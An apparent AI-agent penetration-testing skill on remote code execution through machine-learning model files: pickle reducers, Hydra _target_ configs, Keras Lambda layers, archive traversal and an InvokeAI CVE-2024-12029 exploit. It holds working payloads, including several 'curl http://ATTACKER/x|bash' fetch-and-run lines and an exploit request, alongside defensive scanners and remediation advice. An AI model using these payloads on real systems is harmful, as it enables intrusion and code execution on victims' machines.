exploiting-ai-model-file-rce

Name: exploiting-ai-model-file-rce
Author: xalgord/xalgorix
$npx mdskill add xalgord/xalgorix/exploiting-ai-model-file-rce
---
name: exploiting-ai-model-file-rce
description: Testing machine-learning model files and model-loading services for remote code execution caused by insecure
  deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types
  during authorized penetration tests of AI/ML pipelines.
domain: cybersecurity
subdomain: ai-security
tags:
- ai-security
- model-deserialization
- penetration-testing
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Exploiting AI Model File RCE

## When to Use

- During authorized assessments of ML training/inference pipelines, model registries, artifact buckets, or model hubs
- When a service downloads, loads, or "installs" models from user-controlled URLs or untrusted repositories
- When auto-resume/auto-deploy pipelines load checkpoints (`.ckpt`, `.pt`, `.pth`, `.bin`) without provenance checks
- When assessing web UIs like InvokeAI, TorchServe, Triton, or NeMo/HuggingFace loaders that accept model files
- When reviewing whether "safe" formats (`.safetensors`, `.nemo`, repo `config.json`) still expose instantiation gadgets

## Prerequisites

- **Authorization**: Written penetration testing agreement covering the ML systems and any callback infrastructure
- **Python 3** with `torch`, `joblib`, `numpy`, `tensorflow`/`keras` to craft and load test artifacts in a sandbox
- **fickling, modelscan, picklescan**: static analyzers to inspect pickle opcodes before/after crafting payloads
- **A controlled callback host**: HTTP listener / OOB server (e.g. interactsh) for blind execution confirmation
- **Isolated VM/container**: NEVER load untrusted models on your own host — payloads run during load

## Critical: Techniques Most Often Missed (test these for EVERY model artifact)

Scanners that only diff weights miss code execution that fires *during load*, before any
inference runs. For every model file or model-loading endpoint, work the full matrix below.

```text
# 1. Python pickle reducer (THE #1 vector). Any pickle-backed format runs
#    __reduce__ on load: .pkl, .pt, .pth, .ckpt, .bin, joblib, and numpy
#    .npy/.npz object arrays when np.load is called with allow_pickle=True.
#    torch.load with weights_only=False (the default before PyTorch 2.6)
#    deserializes arbitrary pickle → code exec.
class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://ATTACKER/x|bash",))

# 2. Hydra _target_ instantiation — NO pickle needed. Triggers on "safe"
#    formats (.safetensors __metadata__, .nemo model_config.yaml, config.json)
#    when libs feed untrusted metadata to hydra.utils.instantiate().
#      _target_: builtins.exec
#      _args_: ["import os; os.system('id')"]
#    Block-list bypass: enum.bltns.eval, nemo.core.classes.common.os.system

# 3. Keras/TensorFlow Lambda layer: arbitrary Python in legacy .h5/HDF5 and in
#    .keras loaded with safe_mode=False (safe_mode does NOT cover the old H5
#    format → "downgrade attack").
#    Also CVE-2021-37678: yaml.unsafe_load when loading model from YAML.

# 4. Archive path traversal — most formats are .zip/.tar under the hood.
#    Craft member name "../../tmp/hacked" or a SYMTYPE symlink to write/read
#    arbitrary files on load (ONNX external-weights, model tars).

# 5. GGUF / GGML parser memory corruption (CVE-2024-25664..25668): malformed
#    .gguf triggers heap overflow in the parser.

# 6. Service-level loaders: torch.load on user URL (InvokeAI CVE-2024-12029),
#    TorchServe management API (ShellTorch), Triton --model-control path
#    traversal, numpy np.load(..., allow_pickle=True) (default before NumPy 1.16.3).
```

### How to CONFIRM a hit (avoid destructive payloads)

Use a benign, observable side effect — not a destructive command — to confirm execution:

- File-drop marker: `os.system("id > /tmp/pwned_$(hostname)")` then read `/tmp/pwned_*`.
- OOB callback: `curl http://OOB-ID.oob.example/` or DNS lookup; a hit proves blind execution.
- Static pre-check: `fickling --check-safety model.pt` or `modelscan -p model.pt` should flag
  the reducer (`GLOBAL`/`STACK_GLOBAL` + `REDUCE` opcodes) before you ever load it.
- For Hydra: look for a child process spawned at `from_pretrained`/`restore_from` time, before any weights load.
- Treat ANY child process, outbound connection, or unexpected file at load time as a confirmed hit.
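You can approximate the static pre-check with the standard library alone. The sketch below walks the opcodes with `pickletools.genops`, which only decodes and never executes anything, and lists every `GLOBAL`/`STACK_GLOBAL` import. For zip-backed files such as `torch.save` output, it scans each `*.pkl` member.

Some parts are illustrative assumptions:
- The names `find_globals`, `scan_artifact`, and `suspicious` are hypothetical.
- The `DANGEROUS_MODULES` deny-list is hypothetical.
- The `STACK_GLOBAL` operand tracking is a heuristic.

Treat the output as triage alongside fickling/modelscan, not as a replacement for them.

```python
from __future__ import annotations

import io
import pickletools
import zipfile

# Opcodes that push a str the unpickler may later consume as module/name.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8"}
# Illustrative deny-list for triage only; attackers can route around deny-lists.
DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins",
                     "__builtin__", "runpy", "socket", "shutil"}


def find_globals(data: bytes) -> list[tuple[str, str]]:
    """List (module, name) imports made by GLOBAL / STACK_GLOBAL opcodes.

    pickletools.genops only decodes opcodes; nothing is imported or executed.
    STACK_GLOBAL operands are approximated as the two most recent string pushes.
    """
    found: list[tuple[str, str]] = []
    strings: list[str] = []
    memo: dict[int, object] = {}
    last: object = None  # most recently pushed value, for memo bookkeeping
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            last = arg
            strings.append(arg)
        elif op.name == "MEMOIZE":  # protocol 4+: implicit memo index
            memo[len(memo)] = last
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        elif op.name == "GLOBAL":  # protocols 0-3: arg is "module name"
            module, _, name = arg.partition(" ")
            found.append((module, name))
            last = None
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol 4+
            found.append((strings[-2], strings[-1]))
            last = None
        else:
            last = None
    return found


def scan_artifact(blob: bytes) -> dict[str, list[tuple[str, str]]]:
    """Scan a raw pickle, or every *.pkl member of a zip (torch.save layout)."""
    if zipfile.is_zipfile(io.BytesIO(blob)):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return {n: find_globals(zf.read(n))
                    for n in zf.namelist() if n.endswith(".pkl")}
    return {"<pickle>": find_globals(blob)}


def suspicious(globals_found: list[tuple[str, str]]) -> list[tuple[str, str]]:
    """Keep only imports whose top-level module is on the deny-list."""
    return [g for g in globals_found if g[0].split(".")[0] in DANGEROUS_MODULES]


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for member, found in scan_artifact(fh.read()).items():
                print(path, member, "suspicious:", suspicious(found))
```

A clean PyTorch checkpoint still lists framework globals such as `torch._utils._rebuild_tensor_v2` and `collections.OrderedDict`. What matters is any import outside the set the framework legitimately needs.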

## Workflow

### Step 1: Identify the Loader and Format

Determine exactly how the target ingests models and which API does the deserialization.

```bash
# Map model file extensions present in registry/bucket/repo
# .pt .pth .ckpt .bin .pkl  -> pickle-backed (torch.load / joblib / pickle)
# .h5 .hdf5 .keras          -> Keras (Lambda layer / yaml)
# .safetensors .nemo        -> "safe" weights BUT check for Hydra _target_ metadata
# .onnx                     -> archive/external-weights traversal
# .gguf .ggml               -> parser memory corruption
# .npy .npz                 -> numpy allow_pickle

# Inspect a sample pickle artifact statically BEFORE loading
fickling --check-safety suspicious.pt
modelscan -p suspicious.pt
picklescan -p suspicious.pkl
```

### Step 2: Craft a PyTorch / pickle Reducer Payload

The reducer returns a callable + args executed during unpickling.

```python
# payload_gen.py  (run only in an isolated lab)
import torch, os

class Evil:
    def __reduce__(self):  # benign confirmation marker, not destructive
        return (os.system, ("id > /tmp/pwned; curl http://OOB-ID.oob.example/",))

# place under a key deserialized early so it fires before weights are used
torch.save({"model_state_dict": Evil(), "trainer_state": {"epoch": 10}}, "malicious.ckpt")
```

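On the victim side, `torch.load("malicious.ckpt", weights_only=False)` runs the reducer during unpickling. The payload therefore fires even if the caller errors out afterwards, because `model_state_dict` is now the integer returned by `os.system`, not a state dict. With `weights_only=True`, the load is rejected with an `UnpicklingError` instead.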
A raw `.pkl` works the same with `pickle.dump(Evil(), f)`.
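To see the primitive without a destructive payload, the sketch below swaps `os.system` for the side-effect-free `os.getpid`. `pickle.loads` returns whatever the named callable produced, which proves the callable ran at load time.

The second half shows the allow-list defence described in the Python `pickle` documentation: override `Unpickler.find_class` and refuse every global not explicitly permitted.

`ReducerDemo`, `AllowListUnpickler`, `safe_loads`, and the one-entry `ALLOWED` set are hypothetical names chosen for illustration.

```python
import io
import os
import pickle


class ReducerDemo:
    """Benign stand-in for Evil: the reducer names os.getpid instead of os.system."""
    def __reduce__(self):
        return (os.getpid, ())


blob = pickle.dumps(ReducerDemo())
# Unpickling imports the named callable and calls it; its result replaces the object.
print(pickle.loads(blob) == os.getpid())  # True: os.getpid ran during load

# Allow-list only the (module, name) globals a trusted artifact actually needs.
ALLOWED = {("collections", "OrderedDict")}


class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(data: bytes):
    """Unpickle with the allow-list; ReducerDemo's os.getpid import is refused."""
    return AllowListUnpickler(io.BytesIO(data)).load()
```

PyTorch's `weights_only=True` mode rests on a conceptually similar restricted unpickler.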

### Step 3: Craft a Hydra `_target_` Payload for "Safe" Formats

When the loader passes model metadata/config to `hydra.utils.instantiate()`, no pickle is required.

```yaml
# goes in .nemo model_config.yaml, repo config.json, or .safetensors __metadata__
_target_: builtins.exec
_args_:
  - "import os; os.system('curl http://ATTACKER/x|bash')"
```

If a string block-list is present, bypass via alternative import paths
(`enum.bltns.eval`) or application-resolved names (`nemo.core.classes.common.os.system`).
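On the defensive side, you can spot `_target_` keys without instantiating anything. A `.safetensors` file starts with an 8-byte little-endian header length, followed by a JSON header whose optional `__metadata__` maps strings to strings. The sketch below parses only that header and searches nested values for `_target_`.

It assumes any embedded config is stored as a JSON string. A YAML config (for example a `.nemo` `model_config.yaml`) would need a YAML parser, so the sketch only reports it as an unparsed hit. `safetensors_metadata` and `find_targets` are hypothetical helper names.

```python
import json
import struct


def safetensors_metadata(blob: bytes) -> dict:
    """Parse only the header: u64 little-endian length, then that many bytes of JSON."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    header = json.loads(blob[8:8 + header_len].decode("utf-8"))
    return header.get("__metadata__") or {}


def find_targets(node, path="$"):
    """Yield (json_path, value) for every Hydra-style _target_ key found."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "_target_":
                yield path, value
            yield from find_targets(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_targets(value, f"{path}[{i}]")
    elif isinstance(node, str) and "_target_" in node:
        # __metadata__ values are plain strings; some may carry a serialized config
        try:
            yield from find_targets(json.loads(node), path)
        except json.JSONDecodeError:
            yield path, "<non-JSON string mentioning _target_>"


# Header-only demo file (no tensors); the _args_ string is never executed here.
cfg = json.dumps({"model": {"_target_": "builtins.exec", "_args_": ["print(1)"]}})
header = json.dumps({"__metadata__": {"config": cfg}}).encode()
demo = struct.pack("<Q", len(header)) + header
print(list(find_targets(safetensors_metadata(demo))))
# [('$.config.model', 'builtins.exec')]
```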

### Step 4: Craft Archive Traversal / Keras Lambda Variants

```python
# Archive path traversal: write outside the extract dir on load
import tarfile
def escape(member):
    member.name = "../../tmp/hacked"
    return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
    tf.add("harmless.txt", filter=escape)

# Symlink variant: a SYMTYPE member (linkname = "/tmp") followed by a regular file
# written through that link lands outside the extract dir
# Keras Lambda layer: a model containing a Lambda(lambda x: __import__('os').system('id'))
#   runs on load; legacy .h5 bypasses safe_mode entirely (downgrade attack).
```
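Before you extract a model archive, you can check each member for the traversal and symlink tricks above. The sketch resolves every member name, plus each symlink or hardlink target, against a hypothetical destination `/extract`. It reports anything that would land outside it.

It is a heuristic, and `unsafe_members` is an illustrative name. On Python 3.12+, `TarFile.extractall(path, filter="data")` enforces similar rules in the standard library and is the better default.

```python
import posixpath
import tarfile


def unsafe_members(tf: tarfile.TarFile, dest: str = "/extract") -> list[str]:
    """Return member names that would be written, or would link, outside dest.

    Heuristic only: tar names use "/" so posixpath is used regardless of host OS.
    """
    base = posixpath.normpath(dest)

    def inside(path: str) -> bool:
        path = posixpath.normpath(path)
        return path == base or path.startswith(base + "/")

    bad = []
    for member in tf.getmembers():
        # join() discards base when member.name is absolute, which inside() then rejects
        target = posixpath.join(base, member.name)
        if not inside(target):
            bad.append(member.name)
        elif member.issym() and not inside(
                posixpath.join(posixpath.dirname(target), member.linkname)):
            bad.append(member.name)  # symlink resolves relative to its own directory
        elif member.islnk() and not inside(posixpath.join(base, member.linkname)):
            bad.append(member.name)  # hardlink target is relative to the archive root
    return bad
```

Running it over `traversal_demo.model` from the snippet above would report `../../tmp/hacked`.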

### Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)

When a service downloads+loads models from a URL, host the payload and trigger the endpoint.

```python
import requests
# 1) host payload.ckpt (a pickle reducer) on http://ATTACKER/payload.ckpt
# 2) trigger the unauthenticated install endpoint (scan defaults to false in 5.3.1-5.4.2)
requests.post(
    "http://TARGET:9090/api/v2/models/install",
    params={"source": "http://ATTACKER/payload.ckpt", "inplace": "true"},
    json={}, timeout=5,
)
# torch.load() runs the os.system gadget -> RCE as the InvokeAI process
# Metasploit: exploit/linux/http/invokeai_rce_cve_2024_12029
```

For Transformers4Rec/Merlin (CVE-2025-23298) and FaceDetection-DSFD, the same reducer is
delivered via a trojanized checkpoint or pushed as a serialized blob to a deserializing endpoint.
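When only the version is known, triage against the range this section gives (affected 5.3.1 through 5.4.2, fixed in 5.4.3) is a tuple comparison. The parser below is a simplification that ignores pre-release and local suffixes. `in_vulnerable_range` is a hypothetical helper, not part of InvokeAI.

```python
import re

# Range as stated in this document: 5.3.1 through 5.4.2 affected, 5.4.3 fixed.
VULNERABLE_FROM = (5, 3, 1)
FIXED_IN = (5, 4, 3)


def parse_version(version: str) -> tuple[int, int, int]:
    """'v5.4.2' -> (5, 4, 2); missing parts become 0, suffixes are ignored."""
    nums = [int(n) for n in re.findall(r"\d+", version.split("+")[0])[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def in_vulnerable_range(version: str) -> bool:
    return VULNERABLE_FROM <= parse_version(version) < FIXED_IN


for v in ("5.3.0", "5.3.1", "5.4.2", "5.4.3"):
    print(v, in_vulnerable_range(v))  # False, True, True, False in that order
```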

### Step 6: Confirm and Assess Blast Radius

```bash
# confirm out-of-band: inspect OOB server for the callback; on a lab target verify the
# /tmp/pwned marker and running user (often root in containers).
# record: runs as root/privileged container? network egress? readable ~/.aws, ~/.ssh,
#         or registry credentials?
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Pickle Reducer** | `__reduce__` returns a callable plus an argument tuple that the unpickler invokes (`REDUCE` opcode) during load; this is the core RCE primitive |
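| **weights_only** | `torch.load(file, weights_only=True)` restricts unpickling to tensors and allow-listed types (the default since PyTorch 2.6); `weights_only=False` enables RCE. CVE-2025-32434 bypassed `weights_only=True` in PyTorch ≤ 2.5.1 |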
| **Hydra instantiate** | `hydra.utils.instantiate()` imports+calls any dotted `_target_` from untrusted config/metadata, no pickle needed |
| **Lambda layer RCE** | Keras Lambda layers store arbitrary Python; legacy `.h5` bypasses `safe_mode` (downgrade attack) |
| **Archive slip** | Model formats are `.zip`/`.tar`; crafted member names or symlinks cause path traversal write/read on load |
| **Parser memory corruption** | Malformed GGUF/TFLite files trigger heap overflows in native parsers |
| **Safe format ≠ safe load** | `.safetensors`/`.nemo` carry metadata that can still reach an instantiation gadget |
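You can triage the Lambda-layer row without deserializing the model. A Keras v3 `.keras` file is a zip archive whose `config.json` describes the layers. The sketch reads that JSON and reports every object whose `class_name` is `Lambda`.

Legacy `.h5` files keep the equivalent JSON in an HDF5 attribute (commonly `model_config`). Reading it would need `h5py`, so it is not shown. `lambda_layers` and `scan_keras_archive` are illustrative names.

```python
import io
import json
import zipfile


def lambda_layers(node, path="$"):
    """Yield the JSON path of every object whose class_name is "Lambda"."""
    if isinstance(node, dict):
        if node.get("class_name") == "Lambda":
            yield path
        for key, value in node.items():
            yield from lambda_layers(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from lambda_layers(value, f"{path}[{i}]")


def scan_keras_archive(blob: bytes) -> list[str]:
    """Read config.json from a .keras zip; the model itself is never loaded."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        config = json.loads(zf.read("config.json"))
    return list(lambda_layers(config))
```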

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **fickling** | Decompile/inspect and safety-check pickle opcodes; detect malicious GLOBAL/REDUCE |
| **modelscan** (Protect AI) | Scan PyTorch/TF/Keras/joblib model files for unsafe operators before loading |
| **picklescan** | Lightweight scanner for dangerous imports/opcodes in pickle files |
| **Metasploit** | `invokeai_rce_cve_2024_12029`, `flowise_*` and other model-service RCE modules |
| **safetensors** | Non-executable weights format; recommended remediation target |
| **Isolated VM/container** | Mandatory sandbox for loading any untrusted artifact (seccomp/AppArmor, no egress) |

## Common Scenarios

### Scenario 1: Trojanized Checkpoint in a Model Hub
A `.ckpt` shared on an internal hub embeds a `__reduce__` gadget. An auto-resume training job
calls `torch.load(..., weights_only=False)` and executes the payload as root in the training container.

### Scenario 2: InvokeAI URL Install RCE
InvokeAI 5.3.1–5.4.2 exposes `/api/v2/models/install` with `scan=false` default. Pointing `source`
at an attacker-hosted `.ckpt` triggers `torch.load` pickle deserialization and unauthenticated RCE.

### Scenario 3: "Safe" Format Still Pops a Shell
A `.safetensors` model ships an `__metadata__` block with `_target_: builtins.exec`. The loader feeds
metadata to `hydra.utils.instantiate()` during `from_pretrained`, executing code before weights load.

### Scenario 4: ONNX/Model Tar Path Traversal
A model tar contains a member named `../../home/user/.bashrc`. Extraction during model load overwrites
the file, achieving persistence/RCE on the next shell session.

## Output Format

```
## AI Model File RCE Finding

**Vulnerability**: Remote Code Execution via Insecure Model Deserialization
**Severity**: Critical (CVSS 9.8)
**Component**: torch.load() in /api/v2/models/install (model loader service)
**CVE / Class**: CVE-2024-12029 / Insecure Deserialization (CWE-502)

### Reproduction Steps
1. Host payload.ckpt (pickle __reduce__ -> os.system) on attacker HTTP server
2. POST source=http://ATTACKER/payload.ckpt to /api/v2/models/install (no auth)
3. Service calls torch.load(); reducer executes; OOB callback received at OOB-ID.oob.example

### Evidence
| Item | Detail |
|------|--------|
| Trigger | torch.load(path) with weights_only unset |
| Confirmation | OOB HTTP callback + /tmp/pwned marker (uid=0 root) |
| Blast radius | Worker runs as root in container with AWS creds + egress |
| Static detector | fickling --check-safety flagged REDUCE -> os.system |

### Recommendation
1. Never deserialize untrusted models; prefer Safetensors/ONNX for weights
2. Use torch.load(weights_only=True) or an allow-listed unpickler
3. Enforce model provenance/signatures and malware-scan before load (scan=True)
4. Sandbox deserialization: non-root, seccomp/AppArmor, no network egress
5. Reject untrusted Hydra _target_ / Keras Lambda; validate config metadata
6. Patch loaders (InvokeAI >= 5.4.3, TorchServe, Triton, GGML) to fixed versions
```